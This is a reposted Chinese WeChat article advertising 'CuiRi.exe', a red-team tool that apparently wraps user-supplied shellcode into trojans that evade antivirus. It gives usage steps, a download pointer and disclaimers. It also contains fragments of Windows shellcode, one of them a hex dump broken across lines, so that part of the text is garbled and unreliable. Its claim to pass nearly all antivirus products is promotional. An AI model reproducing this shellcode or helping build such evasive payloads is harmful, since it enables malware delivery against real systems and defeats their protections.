工具简介
基于Syscall进行免杀,且随机混淆,可过几乎所有杀软
内置
go
-strip对Go生成的木马进行编译信息抹除与程序信息混淆
工具本体只有
1
个exe,搭配Go环境即可直接使用
工具使用
下载二进制文件,并且在系统上安装Go语言环境,然后将shellcode保存到1个txt文件中,即可使用本工具生成免杀马。
Usage
of
CuiRi.exe:
-f string 通过shellcode生成免杀马
-manual 查看shellcode生成方法
"xfcx48x83xe4xf0xe8xccx00x00x00x41x51x41x50x52"
"x48x31xd2x51x65x48x8bx52x60x56x48x8bx52x18x48"
"x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9"
"x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41"
"x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48"
fce8
8900
0000
6089
e531 d264
8
b52
308
b
520
c
8
b52
148
b
7228
0f
b7
4
a26
31f
f
31
c0
ac3c
617
c
022
c
20
c1 cf0d
01
c7 e2f0
5257
8
b52
108
b
423
c
01d
0
8
b40
7885
c074
4
a01
d050
8
b48
188
b
5820
01d
3 e33c
498
b
348
b
01d
6
31f
f
31
c0 acc1 cf0d
01
c7
38e0
75f
4
037d
f83b
7d
24
75e2
588
b
5824
01d
3
668
b
下载地址
文章来源:EchoSec
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
多一个点在看
多一条小鱼干
原文始发于微信公众号(黑白之道):神兵利器 | 红队免杀木马生成Tools(附下载)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论